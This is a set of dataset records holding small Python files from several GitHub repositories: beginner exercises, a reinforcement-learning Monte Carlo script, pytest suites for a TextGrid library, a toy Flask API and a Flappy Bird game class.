inventoryItem.addToInStock(slot['current_stock'])\r\n inventoryItem.incrementSlots();\r\n #store item\r\n itemNameToInventoryItem[itemName] = inventoryItem\r\n cokeItem = itemNameToInventoryItem['Coke']\r\n \r\n print(cokeItem)\r\n print(cokeItem.getNumSold())\r\n print(cokeItem.getSoldPct() * 100 )\r\n print(cokeItem.getStockNeed())\r\n \r\n sortChoice = ''\r\n inventoryItemsList = list(itemNameToInventoryItem.values() )\r\n while sortChoice != 'q':\r\n sortChoice = input(\"Sort by (n)ame, (p)ct sold, (s)tocking need, or (q) to quit: \")\r\n if sortChoice == 'n':\r\n inventoryItemsList.sort(key = InventoryItem.getName)\r\n elif sortChoice == 'p':\r\n inventoryItemsList.sort(key = InventoryItem.getSoldPct)\r\n inventoryItemsList.reverse()\r\n elif sortChoice == 's':\r\n inventoryItemsList.sort(key = InventoryItem.getStockNeed)\r\n inventoryItemsList.reverse()\r\n \r\n print('Item Name Sold % Sold In Stock Stock needs ')\r\n \r\n for item in inventoryItemsList:\r\n print('{:20} {:8} {:8.2f}% {:8} {:8}'.format(item.getName(), item.getNumSold(), item.getSoldPct() * 100, item.getNumInStock(), item.getStockNeed()))\r\n print()\r\nmain()","repo_name":"MrMace/PythonProjects","sub_path":"vendingInventory.py","file_name":"vendingInventory.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42171710381","text":"from test_ella.cases import RedisTestCase as TestCase\n\nfrom ella.api import object_serializer, FULL\nfrom ella.core.models import Publishable\nfrom ella.articles.models import Article\n\nfrom nose import tools\n\nclass TestObjectSerialization(TestCase):\n def setUp(self):\n super(TestObjectSerialization, self).setUp()\n self.old_registry = object_serializer._registry\n object_serializer._registry = {}\n\n def tearDown(self):\n super(TestObjectSerialization, self).tearDown()\n object_serializer._registry = self.old_registry\n\n def test_article_is_properly_serialized(self):\n object_serializer.register(Publishable, lambda r, a: 'Publishable %s' % a.id)\n object_serializer.register(Article, lambda r, a: 'Article %s' % a.id, FULL)\n art = Article(id=42)\n tools.assert_equals('Publishable 42', object_serializer.serialize(None, art))\n\n","repo_name":"ella/ella","sub_path":"test_ella/test_api/test_serialization.py","file_name":"test_serialization.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"76"} +{"seq_id":"43858835202","text":"import numpy as np\nfrom tqdm import tqdm\nfrom os.path import join\n\nfrom env import InitState, Step, StateToCoord, IsTerminalState\nfrom env import range_dealer, range_player\nfrom plot import Print2DFunction\nfrom policy import MyPolicy\nn0=20\ndebug = False\niteration = 50000 if debug else 500000\n\n\ndef GenerateEpisode(Q, history):\n # since discount factor is 1\n # and immediate return is always 0 unless the game terminates\n # each return value of intermediate step is equal to the reward of the final state\n # this function will generate [, , ..., ], final_reward \n episode = []\n final_reward = 0\n state = InitState()\n action = MyPolicy(state, Q, history, n0=n0)\n episode.append((state, action))\n while True:\n state, reward = Step(state, action)\n if IsTerminalState(state):\n final_reward = reward\n action = None\n episode.append((state, action))\n break\n else:\n action = MyPolicy(state, Q, history)\n episode.append((state, action))\n \n return episode, final_reward\n\n# Monte-Carlo learning\ndef UpdateQ_MC(Q, simulation, history):\n episode, final_reward = simulation\n for s, a in episode:\n if IsTerminalState(s):\n continue\n \n x, y = StateToCoord(s)\n history[x, y, a] += 1\n # learning rate\n lr = 1 / history[x, y, a]\n Q[x, y, a] += lr * (final_reward - Q[x, y, a])\n '''\n if debug and y == 20 and x == 5 and a== 0:\n visit_time = np.sum(history[x, y, :])\n epsilon = n0 / (n0 + visit_time)\n print('Q: {:.2f}\\t return: {}\\t lr: {:.2f} \\t epsilon: {:.2f}'.format(Q[x, y, a], final_reward, lr, epsilon))\n '''\ndef OptimizeQValue(Q):\n # count of visit times for each state \n history = np.zeros(shape=[10, 21, 2])\n if debug:\n generator = range(iteration)\n else:\n generator = tqdm(range(iteration))\n for _ in generator:\n simulation = GenerateEpisode(Q, history)\n UpdateQ_MC(Q, simulation, history)\n return Q\n \ndef GetQvalue():\n Q = np.zeros(shape=[10, 21, 2])\n Q = OptimizeQValue(Q)\n return Q\n \ndef GetFilePath(name):\n name = name.replace(' ', '_')\n path = join('results', name + '.png')\n return path\n \ndef Section2_Monte_Carlo_Control():\n Q = GetQvalue()\n V = np.max(Q, axis=-1)\n name_V = 'Qstar'\n path_V = GetFilePath(name_V)\n Print2DFunction(V, range_dealer, range_player, title=name_V, path=path_V)\n\nif __name__=='__main__':\n Section2_Monte_Carlo_Control()\n \n ","repo_name":"Ao-Lee/Reinforcement-Learning-David-Silver-Solution","sub_path":"MC_Control.py","file_name":"MC_Control.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"76"} +{"seq_id":"2900588610","text":"command = input()\nnotes = [0] * 10\n\nwhile command != \"End\":\n tokens = command.split(\"-\")\n priority = int(tokens[0]) - 1\n note = tokens[1]\n notes.pop(priority)\n notes.insert(priority, note)\n\n command = input()\nresult = [x for x in notes if x != 0]\nprint(result)\n","repo_name":"AsenAsenov1/SoftUni-Programming-Fundamentals-with-Python-September-2022","sub_path":"13_lists_advanced_lab/3_to_do_list.py","file_name":"3_to_do_list.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"5443714611","text":" # ejemplo 1\nnombres =[ 'Pedro', 'Josue', 'Justin']\n\n\n# for in\nfor nombre in nombres:\n print(nombre)\n \n \n # ejemplo 2\n \nDj= ['Jonas', 'Tiesto','david', 'allan', 'Martin', 'Marsmello' ]\n\nfor djs in Dj :\n print(djs)\n \n \n \n # ejemplo 3\n \n clientes = [ 'Renato ', 'renzo', 'Jorge', 'Pedro', 'Balvin']\n \n for cliente in clientes :\n print(cliente)# \n \n \n \n # ejemplo 4\n \n \n users = ['cliente-1', 'Cliente-2','cliente-3', 'Cliente-4','cliente-5', 'Cliente-6']\n \n #uso de for in in\n \n for user in users :\n print(user)\n \n \n \n","repo_name":"Julio-73/Course-Python","sub_path":"for/ejercicio38.py","file_name":"ejercicio38.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3854583660","text":"import pytest\nfrom aligned_textgrid.sequences.sequences import *\nfrom aligned_textgrid.sequences.tiers import *\nimport numpy as np\nfrom praatio.utilities.constants import Interval\n\nclass TestSequenceIntervalDefault:\n \"\"\"_Test default behavior of SequenceInterval_\n \"\"\"\n seq_int = SequenceInterval()\n class SampleClassI(SequenceInterval):\n def __init__(\n self, \n Interval = Interval(None, None, None)\n ):\n super().__init__(Interval = Interval)\n\n def test_default_class(self):\n assert self.seq_int.__class__ is SequenceInterval\n \n def test_default_super_class(self):\n assert self.seq_int.superset_class is Top\n \n def test_default_subset_class(self):\n assert self.seq_int.subset_class is Bottom\n \n def test_default_super_instance(self):\n assert self.seq_int.super_instance is None\n\n def test_default_subset_list(self):\n assert type(self.seq_int.subset_list) is list\n assert len(self.seq_int.subset_list) == 0\n\n def test_default_sub_starts(self):\n assert type(self.seq_int.sub_starts) is np.ndarray\n assert len(self.seq_int.sub_starts) == 0\n\n def test_default_sub_ends(self):\n assert type(self.seq_int.sub_ends) is np.ndarray\n assert len(self.seq_int.sub_ends) == 0\n \n def test_default_sub_labels(self):\n assert type(self.seq_int.sub_labels) is list\n assert len(self.seq_int.sub_labels) == 0\n\n def test_default_intervalinfo(self):\n assert self.seq_int.start is None\n assert self.seq_int.end is None\n assert self.seq_int.label is None\n\n def test_default_fol(self):\n assert self.seq_int.fol.label == \"#\"\n\n def test_default_prev(self):\n assert self.seq_int.fol.label == \"#\"\n\n def test_default_super_strictness(self):\n local_sample = self.SampleClassI()\n with pytest.raises(Exception):\n self.seq_int.set_super_instance(local_sample)\n\n def test_default_sub_strictness(self):\n local_sample = self.SampleClassI()\n with pytest.raises(Exception):\n self.seq_int.append_subset_list(local_sample)\n \n def test_default_intier(self):\n local_sample = self.SampleClassI()\n assert local_sample.intier is None\n \n def test_default_tieridx(self):\n local_sample = self.SampleClassI()\n assert local_sample.tier_index is None\n\n def test_defaul_getby(self):\n local_sample = self.SampleClassI()\n assert local_sample.get_tierwise(1) is None\n\nclass TestSuperSubClassSetting:\n class LocalClassA(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n\n class LocalClassB(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n\n pre_instanceA = LocalClassA()\n pre_instanceB = LocalClassB() \n\n def test_presetting(self):\n assert self.pre_instanceA.superset_class is Top\n assert self.pre_instanceA.subset_class is Bottom\n assert self.pre_instanceB.superset_class is Top\n assert self.pre_instanceB.subset_class is Bottom\n\n def test_presetting_instances(self):\n with pytest.raises(Exception):\n self.pre_instanceB.set_super_instance(self.pre_instanceA)\n \n with pytest.raises(Exception):\n self.pre_instanceA.append_subset_list(self.pre_instanceB)\n\n def test_bad_super_setting(self):\n with pytest.raises(Exception):\n self.LocalClassA.set_superset_class(\"B\")\n \n with pytest.raises(Exception):\n self.LocalClassA.set_superset_class(self.LocalClassA)\n \n self.LocalClassA.set_superset_class()\n \n def test_bad_sub_setting(self):\n with pytest.raises(Exception):\n self.LocalClassA.set_subset_class(\"B\")\n \n with pytest.raises(Exception):\n self.LocalClassA.set_subset_class(self.LocalClassA)\n\n self.LocalClassA.set_subset_class()\n\n def test_none_setting(self):\n new_instanceA = self.LocalClassA()\n\n try:\n new_instanceA.set_super_instance()\n except:\n assert False \n\n def test_super_setting(self):\n self.LocalClassA.set_superset_class(self.LocalClassB)\n new_instanceA = self.LocalClassA()\n new_instanceB = self.LocalClassB()\n assert self.pre_instanceA.superset_class is self.LocalClassB\n assert new_instanceA.superset_class is self.LocalClassB\n\n assert self.pre_instanceB.subset_class is self.LocalClassA\n assert new_instanceB.subset_class is self.LocalClassA\n\n\n def test_postsetting_instances(self):\n try:\n self.pre_instanceA.set_super_instance(self.pre_instanceB)\n except Exception as exc:\n assert False, f\"{exc}\"\n\n assert self.pre_instanceA.super_instance is self.pre_instanceB\n assert self.pre_instanceA in self.pre_instanceB.subset_list\n\nclass TestPrecedence:\n class LocalClassA(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n\n class LocalClassB(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n \n def test_fol_prev_success(self):\n A1 = self.LocalClassA()\n A2 = self.LocalClassA()\n\n with pytest.raises(Exception):\n A1.set_fol(A1)\n\n with pytest.raises(Exception):\n A1.set_prev(A1)\n\n try:\n A1.set_fol(A2)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert A1.fol is A2\n assert A2.prev is A1\n\n try: \n A1.set_prev(A2)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert A1.prev is A2\n assert A2.fol is A1\n \n def test_fol_prev_exception(self):\n A1 = self.LocalClassA()\n B2 = self.LocalClassB()\n\n with pytest.raises(Exception):\n A1.set_fol(B2)\n\n with pytest.raises(Exception):\n A1.set_prev(B2)\n\nclass TestHierarchy:\n\n class UpperClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class LowerClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n UpperClass.set_subset_class(LowerClass)\n\n def test_super_instance(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n try:\n lower1.set_super_instance(upper1)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert lower1.super_instance is upper1\n assert lower1 in upper1\n\n try:\n lower2.set_super_instance(upper1)\n except Exception as exc:\n assert False, f\"{exc}\"\n\n assert lower2.super_instance is upper1\n assert lower2 in upper1\n\n assert lower1.fol is lower2\n assert lower2.prev is lower1\n\n def test_subset_instance(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n try:\n upper1.append_subset_list(lower1)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert lower1.super_instance is upper1\n assert lower1 in upper1\n\n try:\n upper1.set_subset_list([lower2, lower1])\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert lower1.super_instance is upper1\n assert lower1 in upper1\n assert lower2.super_instance is upper1\n assert lower2 in upper1\n assert lower1.fol is lower2\n assert lower2.prev is lower1\n\n def test_subset_index(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n lower3 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n upper1.set_subset_list([lower1, lower2])\n\n assert upper1.index(lower1) == 0\n assert upper1.index(lower2) == 1\n\n with pytest.raises(ValueError):\n _ = upper1.index(lower3)\n\n def test_subset_pop(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n lower3 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n upper1.set_subset_list([lower1, lower2, lower3])\n\n assert len(upper1) == 3\n assert lower3 in upper1\n assert lower3.fol.label == \"#\"\n assert lower2.fol is lower3\n\n upper1.pop(lower3)\n assert len(upper1) == 2\n assert not lower3 in upper1\n assert lower2.fol.label == \"#\"\n assert not lower2.fol is lower3\n\n upper1.set_subset_list([lower1, lower2, lower3])\n\n upper1.pop(lower2)\n assert lower1.fol is lower3\n assert lower3.prev is lower1\n\n\n\n def test_hierarchy_strictness(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n\n with pytest.raises(Exception):\n upper1.set_super_instance(lower1)\n \n with pytest.raises(Exception):\n lower1.append_subset_list(upper1)\n \n with pytest.raises(Exception):\n lower1.set_super_instance(lower1)\n \n with pytest.raises(Exception):\n lower1.append_subset_list(lower1)\n\n def test_validation(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n gap = self.LowerClass(Interval(6,10,\"gap\"))\n overlap = self.LowerClass(Interval(4,10,\"overlap\"))\n snug = self.LowerClass(Interval(5,10,\"snug\"))\n\n upper1.set_subset_list([lower1, snug])\n assert upper1.validate()\n\n upper1.set_subset_list([lower1, gap])\n assert not upper1.validate()\n\n upper1.set_subset_list([lower1, overlap])\n assert not upper1.validate()\n\nclass TestIteration:\n class UpperClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class LowerClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n UpperClass.set_subset_class(LowerClass)\n\n def test_iter(self):\n upper1 = self.UpperClass(Interval(0, 10, \"one\"))\n for x in range(10):\n upper1.append_subset_list(\n self.LowerClass(Interval(x, x+1, str(x)))\n )\n\n try:\n for item in upper1:\n pass\n except Exception as exc:\n assert False, f\"{exc}\"\n \n labels = [x.label for x in upper1]\n assert len(labels) == 10\n\nclass TestGetLenIn:\n class UpperClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class LowerClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n UpperClass.set_subset_class(LowerClass)\n upper1 = UpperClass(Interval(0, 10, \"upper\"))\n\n lower1 = LowerClass(Interval=Interval(0,3,\"lower1\"))\n lower2 = LowerClass(Interval=Interval(3,8,\"lower2\")) \n lower3 = LowerClass(Interval=Interval(8,10,\"lower3\"))\n lower4 = LowerClass(Interval=Interval(10,11,\"lower4\"))\n upper1.set_subset_list([lower1, lower2, lower3])\n\n def test_in(self):\n assert self.lower1 in self.upper1\n assert not self.lower4 in self.upper1\n\n def test_get(self):\n assert self.lower1 is self.upper1[0]\n for a,b in zip([self.lower2, self.lower3], self.upper1[1:3]):\n assert a is b\n with pytest.raises(IndexError):\n _ = self.upper1[4]\n \n def test_len(self):\n assert len(self.upper1) == 3\n\nclass TestSetFeature:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n sample_obj = SampleClass(Interval=Interval(0, 10, \"sample\"))\n\n def test_set_feature(self):\n self.sample_obj.set_feature(\"new_feat\", 5)\n assert self.sample_obj.new_feat == 5\n\n self.sample_obj.new_feat = \"A\"\n assert self.sample_obj.new_feat == \"A\"\n\nclass TestReturnInterval:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n sample_obj = SampleClass(Interval=Interval(0, 10, \"sample\"))\n\n def test_return_interval_class(self):\n out_interval = self.sample_obj.return_interval()\n assert out_interval.__class__ is Interval\n def test_return_interval_values(self):\n out_interval = self.sample_obj.return_interval()\n assert out_interval.start == 0\n assert out_interval.end == 10\n assert out_interval.label == \"sample\"\n\nclass TestFusion:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n class Upper(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class Lower(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n Lower.set_superset_class(Upper) \n\n def test_rightwards_simple(self):\n fuser = self.SampleClass(Interval(0,1,\"one\"))\n fusee = self.SampleClass(Interval(1, 2, \"two\"))\n fuser.set_fol(fusee)\n\n try:\n fuser.fuse_rightwards()\n except:\n assert False\n \n assert fuser.label == \"one two\"\n assert fuser.end == 2\n\n with pytest.raises(Exception):\n fuser.fuse_rightwards()\n\n def test_leftwards_simple(self):\n fusee = self.SampleClass(Interval(0,1,\"one\"))\n fuser = self.SampleClass(Interval(1, 2, \"two\"))\n fuser.set_prev(fusee)\n\n try:\n fuser.fuse_leftwards()\n except:\n assert False\n \n assert fuser.label == \"one two\"\n assert fuser.start == 0\n\n with pytest.raises(Exception):\n fuser.fuse_leftwards()\n\n def test_rightwards_hierarchy(self):\n upper1 = self.Upper(Interval(0,5, \"upper1\"))\n upper2 = self.Upper(Interval(5,10, \"upper2\"))\n lower1 = self.Lower(Interval(0,1, \"lower1\"))\n lower2 = self.Lower(Interval(1,5, \"lower2\"))\n lower3 = self.Lower(Interval(5,6, \"lower3\"))\n lower4 = self.Lower(Interval(6,10, \"lower3\"))\n\n upper1.set_subset_list([lower1, lower2])\n upper2.set_subset_list([lower3, lower4])\n upper1.set_fol(upper2)\n\n assert len(upper1) == 2\n assert lower2 in upper1\n assert lower1.fol is lower2\n try:\n lower1.fuse_rightwards()\n except:\n assert False\n\n assert len(upper1) == 1\n assert not lower2 in upper1\n assert lower1.fol.label == \"#\"\n\n assert not lower3 in upper1\n\n upper1.fuse_rightwards()\n\n assert len(upper1) == 3\n assert lower3 in upper1\n assert lower1.fol is lower3\n\n def test_leftwards_hierarchy(self):\n upper1 = self.Upper(Interval(0,5, \"upper1\"))\n upper2 = self.Upper(Interval(5,10, \"upper2\"))\n lower1 = self.Lower(Interval(0,1, \"lower1\"))\n lower2 = self.Lower(Interval(1,5, \"lower2\"))\n lower3 = self.Lower(Interval(5,6, \"lower3\"))\n lower4 = self.Lower(Interval(6,10, \"lower3\"))\n\n upper1.set_subset_list([lower1, lower2])\n upper2.set_subset_list([lower3, lower4])\n upper1.set_fol(upper2)\n\n assert len(upper1) == 2\n assert lower2 in upper1\n assert lower1.fol is lower2\n try:\n lower2.fuse_leftwards()\n except:\n assert False\n\n assert len(upper1) == 1\n assert not lower1 in upper1\n assert lower2.prev.label == \"#\"\n\n assert not lower2 in upper2\n\n upper2.fuse_leftwards()\n\n assert len(upper2) == 3\n assert lower2 in upper2\n assert lower3.prev is lower2\n\n def test_rightward_tier(self):\n tier1 = SequenceTier(tier = [\n Interval(0, 5, \"upper1\"),\n Interval(5, 10, \"upper2\")\n ],\n entry_class=self.Upper)\n tier2 = SequenceTier(tier = [\n Interval(0, 2, \"lower1\"),\n Interval(2, 5, \"lower2\"),\n Interval(5, 7, \"lower3\"),\n Interval(7, 10, \"lower4\")\n ],\n entry_class=self.Lower)\n\n rt = TierGroup(tiers=[tier1, tier2])\n assert len(rt[0]) == 2\n assert len(rt[1]) == 4\n\n assert len(rt[0][0]) == 2\n assert rt[1][1].fol.label == \"#\"\n\n third_lower = rt[1][2]\n\n assert third_lower.tier_index == 2\n \n rt[1][0].fuse_rightwards()\n\n assert len(rt[0]) == 2\n assert len(rt[1]) == 3\n\n assert len(rt[0][0]) == 1\n assert rt[1][0].fol.label == \"#\"\n\n assert third_lower.tier_index == 1\n\n with pytest.raises(Exception):\n rt[1][0].fuse_rightwards()\n \n rt[0][0].fuse_rightwards()\n assert len(rt[0]) == 1\n assert len(rt[1]) == 3\n\n assert rt[0][0].fol.label == \"#\"\n\n try:\n rt[1][0].fuse_rightwards()\n except:\n assert False\n\n def test_leftward_tier(self):\n tier1 = SequenceTier(tier = [\n Interval(0, 5, \"upper1\"),\n Interval(5, 10, \"upper2\")\n ],\n entry_class=self.Upper)\n tier2 = SequenceTier(tier = [\n Interval(0, 2, \"lower1\"),\n Interval(2, 5, \"lower2\"),\n Interval(5, 7, \"lower3\"),\n Interval(7, 10, \"lower4\")\n ],\n entry_class=self.Lower)\n\n rt = TierGroup(tiers=[tier1, tier2])\n assert len(rt[0]) == 2\n assert len(rt[1]) == 4\n\n assert len(rt[0][0]) == 2\n assert rt[1][0].prev.label == \"#\"\n\n third_lower = rt[1][2]\n\n assert third_lower.tier_index == 2\n \n rt[1][1].fuse_leftwards()\n\n assert len(rt[0]) == 2\n assert len(rt[1]) == 3\n\n assert len(rt[0][0]) == 1\n assert rt[1][0].prev.label == \"#\"\n\n assert third_lower.tier_index == 1\n\n with pytest.raises(Exception):\n rt[1][0].fuse_leftwards()\n \n rt[0][1].fuse_leftwards()\n assert len(rt[0]) == 1\n assert len(rt[1]) == 3\n\n assert rt[0][0].fol.label == \"#\"\n\n try:\n rt[1][1].fuse_leftwards()\n except:\n assert False\nclass TestTop:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n sample_obj = SampleClass(Interval=Interval(1,2, \"sample\"))\n\n def test_top_default(self):\n assert Top.superset_class is None\n\n def test_top_insensitivity(self):\n Top.set_superset_class(self.SampleClass)\n assert Top.superset_class is None\n\n def test_no_top_superinstance(self):\n with pytest.raises(Exception):\n t = Top()\n t.set_super_instance(self.sample_obj)\n\nclass TextBottom:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n sample_obj = SampleClass(Interval=Interval(1,2, \"sample\"))\n\n def test_bottom_default(self):\n assert Bottom.subset_class is None\n \n def test_bottom_insensitivity(self):\n Bottom.set_subset_class(self.SampleClass)\n assert Bottom.subset_class is None\n\n def test_bottom_no_append_subset(self):\n b = Bottom()\n with pytest.raises(Exception):\n b.append_subset_list(self.sample_obj)\n\n def test_bottom_no_set_subset(self):\n b = Bottom()\n with pytest.raises(Exception):\n b.set_subset_list([self.sample_obj])\n","repo_name":"Forced-Alignment-and-Vowel-Extraction/alignedTextGrid","sub_path":"tests/test_sequences/test_sequences.py","file_name":"test_sequences.py","file_ext":"py","file_size_in_byte":21470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"19015219291","text":"from flask import Flask, jsonify, request\r\napp = Flask(__name__)\r\n\r\naddresses = [\r\n{\r\n'location' : '56.844494, 60.653655',\r\n'name' : 'URFU'\r\n},\r\n{\r\n'location' : '56.840469, 60.597754',\r\n'name' : 'Theather'\r\n}, \r\n{\r\n'location' : '56.837956, 60.596268',\r\n'name' : 'Square'\r\n}]\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return jsonify({'message' : \"hello\"})\r\n\r\n@app.route('/addr', methods=['GET'])\r\ndef returnAll():\r\n return jsonify({'addresses' : addresses})\r\n\r\n@app.route('/addr/', methods=['GET'])\r\ndef returnOne(location):\r\n\taddr = [address for address in addresses if address['location'] == location]\r\n\treturn jsonify({'address' : addr[0]})\r\n\r\n@app.route('/addr', methods=['POST'])\r\ndef addOne():\r\n\taddress = {'location' : request.json['location']}\r\n\r\n\taddresses.append(address)\r\n\treturn jsonify({'adresses' : addresses})\r\n\r\n\r\n@app.route('/addr', methods=['PUT'])\r\ndef editOne(location):\r\n\taddr = [address for address in adresses if address['location'] == location]\r\n\taddr[0]['location'] = request.json['location']\r\n\treturn jsonify({'address' : addr[0]})\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=8080)\r\n","repo_name":"anmironova/pomnikorni","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25115272972","text":"# Allow for type hinting while preventing circular imports\nfrom __future__ import annotations\nfrom typing import TYPE_CHECKING\n\n# Import standard modules\nimport math\nfrom math import pi as PI\n\n# Import non-standard modules\nimport pygame as pg\nfrom pygame.sprite import Sprite\n\n# Import local classes and methods\nimport helper_functions as hf\n\n# Import local class and methods that are only used for type hinting\nif TYPE_CHECKING:\n from settings import Settings\n\n\nclass Bird(Sprite):\n \"\"\"A class for the bird\"\"\"\n\n def __init__(self, screen: pg.Surface, settings: Settings):\n \"\"\"Initialize the bird's settings\"\"\"\n\n super(Bird, self).__init__()\n self.screen = screen\n self.screen_rect = self.screen.get_rect()\n\n # Physics parameters\n self.accel = settings.gravity\n self.max_velocity = settings.max_velocity\n self.jump_velocity = settings.jump_velocity\n\n # Image\n self.color = 0 # 0 = Yellow, 1 = Red, 2 = Blue\n self.frames = settings.bird_frames\n self.image_orig = self.frames[self.color][0]\n self.image = self.image_orig.copy()\n self.mask = pg.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\n self.animation_speed = 75\n self.idle_period = 3000\n self.idle_amp = 50\n self.y_0 = self.screen_rect.centery\n\n # Sound effects\n self.sfx_flap = settings.sfx_flap\n self.sfx_hit = settings.sfx_hit\n self.sfx_fall = settings.sfx_fall\n self.sfx_pop = settings.sfx_pop\n\n self.init_dynamic_variables()\n\n def init_dynamic_variables(self):\n \"\"\"Initializes the birds's dynamic variables\"\"\"\n\n # Positioning\n self.x = 150\n self.y = self.y_0\n self.rect.center = (self.x, self.y)\n self.velocity = 0\n self.angle = 0\n self.prev_jump_elev = 0\n self.current_frame = 0\n self.animation_time = 0\n self.idle_time = 0\n\n def flap(self):\n \"\"\"Jump the bird\"\"\"\n\n # Update the bird's velocity\n self.velocity = -self.jump_velocity\n self.prev_jump_elev = self.y\n self.sfx_flap.play()\n\n def change_color(self):\n \"\"\"Changes the color of the bird by updating the reference to a new spritesheet and plays the sound effect\"\"\"\n \n self.color = (self.color + 1) % len(self.frames)\n self.sfx_pop.stop()\n self.sfx_pop.play()\n\n def update(self, dt: int, settings: Settings):\n \"\"\"Update the bird's animation and location\"\"\"\n\n # Update the animation\n if settings.current_state != 'GAMEOVER':\n self.animation_time += dt\n if self.animation_time > self.animation_speed:\n self.animation_time = 0\n self.current_frame = (self.current_frame + 1) % len(self.frames[0])\n self.image_orig = self.frames[self.color][self.current_frame]\n\n # At beginning of game, bird animates smoothly up and down\n if settings.current_state in ['SPLASH', 'READY']:\n self.idle_time = (self.idle_time + dt) % self.idle_period\n theta = self.idle_time / self.idle_period * 2 * PI\n self.y = self.y_0 + self.idle_amp * math.sin(theta)\n self.angle = -45 * math.cos(theta)\n\n # During PLAY state, bird is affected by gravity and rotates based on flaps\n elif settings.current_state in ['PLAY', 'GAMEOVER']:\n\n # Update the bird's velocity and position\n if self.y < settings.ground_elev:\n new_velocity = self.velocity + self.accel * dt\n self.velocity = hf.clamp(new_velocity, -self.max_velocity, self.max_velocity)\n self.y += self.velocity * dt\n\n # Rotate the bird based on previous jump elevation\n self.angle = hf.translate(self.y, self.prev_jump_elev, self.prev_jump_elev + 150, 20, -90)\n\n # Update the rect\n self.image = pg.transform.rotate(self.image_orig, self.angle)\n self.rect = self.image.get_rect()\n self.rect.center = self.x, self.y\n self.mask = pg.mask.from_surface(self.image)\n\n def blitme(self):\n \"\"\"Draw the bird at its current location\"\"\"\n \n self.screen.blit(self.image, self.rect)\n","repo_name":"djsereno/Flappy-Bird","sub_path":"flappybird/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40681280766","text":"# counter=1\n# movie_list=['Die Hard', 'Terminator', 'Batman', 'Superman']\n# for values in movie_list:\n# print(counter, '>' + values)\n# counter +=1\n#\n#\n# # Don't know how to number\n# counter=1\n# places_list=['Spain', 'Italy', 'France', 'Luxemburg']\n# for values in places_list:\n# print(counter, 